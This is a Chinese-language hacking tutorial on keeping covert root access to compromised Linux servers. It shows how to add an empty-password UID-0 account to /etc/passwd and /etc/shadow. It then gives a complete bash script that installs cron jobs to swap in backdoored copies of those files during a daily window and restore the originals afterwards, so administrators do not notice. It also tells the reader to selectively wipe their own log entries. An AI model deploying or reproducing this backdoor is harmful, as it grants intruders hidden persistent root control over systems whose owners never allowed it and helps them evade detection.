Linux隱藏帳戶

Linux系統後門技術（隱藏帳戶篇）
 
       每當我們歡天喜地的得到一個linux系統的伺服器肉雞時，最大的願望就是能把它永遠留住。當然，永遠留住是不可能的，但是我們要盡量的不讓它飛走。這就要用到linux的後門技術了，這是項複雜的技術，本人水平有限不可能面面俱到，我只希望這一系列文章能為大家提供一點思路，在您hacking的道路上開啟一扇方便之門！
       言歸正傳，首先，給大家簡單介紹一下linux的系統後門。Linux後門的種類甚至比windows下的還要多，畢竟是GNU作業系統，後門製作的空間也會很大。常見的一些後門技術有隱藏S位shell指令檔、增加root組使用者、記錄破解使用者密碼、替換系統網路服務、可裝載核心模組、rootkit工具包等等，這些技術一直被駭客們不斷的組合翻新利用著，如果大家想深入的學習一下linux後門，推薦大家到http://www.egocrew.de/這個網站去看看，那裡有比較新的後門技術和工具，並且很多工具都有原始碼。
       好了，書說簡短，下面讓我們具體的看一下如何來製作安裝和使用各種後門，今天是隱藏帳戶的添加和駐留，高手應該可以跳過不看了。現在，假設我們得到了一個linux肉雞的shell，並且已經獲得了root的許可權，從最簡單的開始，通常的我們應當去添加個超級使用者。
用vi 編輯/etc/passwd檔案，在單獨的一行中添入這樣一行資訊“musicyxy:x:0:0::/:/bin/sh”，
1
 
（圖1）
然後同樣vi編輯/etc/shadow檔案，在單獨的一行中添加“musicyxy::13407:0:99999:7:::”，
2
（圖2）
/etc/passwd和/etc/shadow是linux中存放使用者和密碼資訊的兩個檔案，使用者和密碼分開存放也是出於安全的考慮。編輯完成後，系統中就多了一個musicyxy使用者，它的許可權只比root少一點點，密碼為空白，這樣下次我們進入這台主機的時候就可以使用musicyxy這個使用者了。有很多linux的初學者會這樣問：“為什麼修改了這兩個檔案就多了個使用者？而且還會有ROOT組的許可權？我平時是用useradd命令添加使用者的啊!”現在我就來給大家說明一下原理。
我們平時用的useradd和passwd命令是直接對/etc/passwd和/etc/shadow這個兩檔案進行修改生效的。這兩個檔案上面有很多欄位，每個欄位都有不同的意義，我下面來給大家詳細說明。/etc/passwd檔案用來存放系統帳號資訊，每個欄位用“：”隔開，它們的內容分別是“使用者名稱：密碼：使用者ID：組ID：身份描述：使用者的家目錄：使用者登入後所使用的SHELL”，現在大家明白了吧，linux就是通過讀寫這個檔案來設定使用者資訊的。/etc/shadow檔案用來存放使用者密碼資訊，其各個欄位的意義為“使用者名稱：密碼的MD5加密值：數字表示自系統使用以來口令被修改的天數：數字表示口令的最小修改間隔：數字表示口令更改的周期：數字表示口令失效的天數：數字表示口令失效以後帳號會被鎖定多少天：使用者帳號到期時間：保留欄位尚未使用”。通過上面的說明相信大家都可以手動修改這兩個檔案來設定帳戶了吧。現在我們的超級後門使用者是留下了，但是這樣明晃晃的添加使用者是不是太大膽了！我們不妨藉助其他的辦法來隱藏這個使用者，當然隱藏的方法很多，這要看你對linux的瞭解程度和hacking的思路。我來給大家介紹一種我自創的方法——“借屍還魂”。
思路是這樣的，利用crontab（計劃任務）在固定的時間做如下操作：首先我們把正常的passwd和shadow檔案備份到別的地方，然後在原目錄偽造這兩個檔案讓它們生效，最後將musicyxy:x:0:0::/:/bin/sh和musicyxy::13407:0:99999:7:::兩條資訊追加到偽造的passwd和shadow檔案中，然後在過一段時間後將原來的正常檔案還原回/etc/目錄。這樣我們就可以在偽造檔案生效的時間段內登陸系統，在不登陸的時候，偽造檔案也會自動還原為正常檔案，這樣不容易被管理員發現，並且在一定程度上避免了正常使用者資訊的損壞。舉個例子：我們可以把正常的檔案放在/tmp/目錄中，然後利用計劃任務讓系統在每天的下午2-3點把偽造的後門檔案放到/etc/目錄中，然後我們就在下午2-3點HACK進肉雞中操作，3點過後後門會自動清除，正常的檔案會回到/etc目錄中，除非管理員在2-3點時查看/etc/passwd，否則很難發現後門，當然，別忘了在每次您登陸肉雞後要記得把日誌有選擇性的清除掉！也就是說把自己的日誌清除，保留其他使用者的日誌，關於這部分技術我會在以後的文章中告訴大家。
我把這個使用者後門寫成了shell程式，代碼如下：
#!/bin/bash
echo '40 11 * * * cat /etc/passwd > /dev/ttypwd' >> /etc/door.cron;
echo '40 11 * * * cat /etc/shadow > /dev/ttysdw' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy:x:0:0::/:/bin/sh" >> /etc/passwd' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy::9999:0:99999:7:::" >> /etc/shadow' >> /etc/door.cron;
echo '09 12 * * * cat /dev/ttypwd > /etc/passwd' >> /etc/door.cron;
echo '09 12 * * * cat /dev/ttysdw > /etc/shadow' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttypwd' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttysdw' >> /etc/door.cron;
service crond restart;
crontab /etc/door.cron;
以上就是一個具體的後門帳戶實現，我來給大家解釋一下這段代碼。
第一行是linux中shell程式的開頭標誌，代表代碼中所使用的SHELL。第二行是將“40 11 * * * cat /etc/passwd > /dev/ttypwd”這段資訊追加到/etc/door.cron檔案中。/etc/door.cron是使用者自訂的crontab列表檔案，任務計劃就是依據這個檔案的內容來執行的。它的編寫格式是* * * * * command ,前面的5個星分別代表分鐘（0~59），小時（0~23），日期（1~31），月份（1~12），星期（0~6），星後面加要執行的命令。那麼第二行所代表的意思就是在每天的11點40分運行cat /etc/passwd > /dev/ttypwd，後面的相信您也能看懂了，以此類推，運行到最後一行就是利用crontab命令讓檔案生效。
       我們來看一下它的執行效果：
11點39分的時候/etc/passwd檔案正常，沒有後門帳戶，3.
 
 
 
（圖3）
11點42分，後門帳戶出現！多了一個ROOT組使用者資訊musicyxy:x:0:0::/:/bin/sh!4！
（圖4）
 
11點45分，我利用後門帳戶登入成功，who am i命令顯示是ROOT使用者，許可權很大，5。
（圖5）
12點10分,後門帳戶自動隱形，和11點39分之前一樣，沒有什麼異常，但等到明天的11點40後門帳戶又會出現！6
（圖6）
 
這個程式我在FC6和THIZ7.0下做過測試都沒問題，但是其他發行版可能需要作相應的更改，而且系統中一定要安裝了crond服務才能正常運行。到此，隱藏後門帳戶駐留成功!我的文章也要結束了，這篇文章非常的基礎，介紹了一些linux使用者密碼的知識，以及crontab命令的使用方式，完全都是SHELL層級的操作，適合新手學習，並且希望能給高手帶來一點思路！以後我會為大家介紹更加隱蔽、更難清除、更高層次的後門，希望大家關注！今天就到這裡了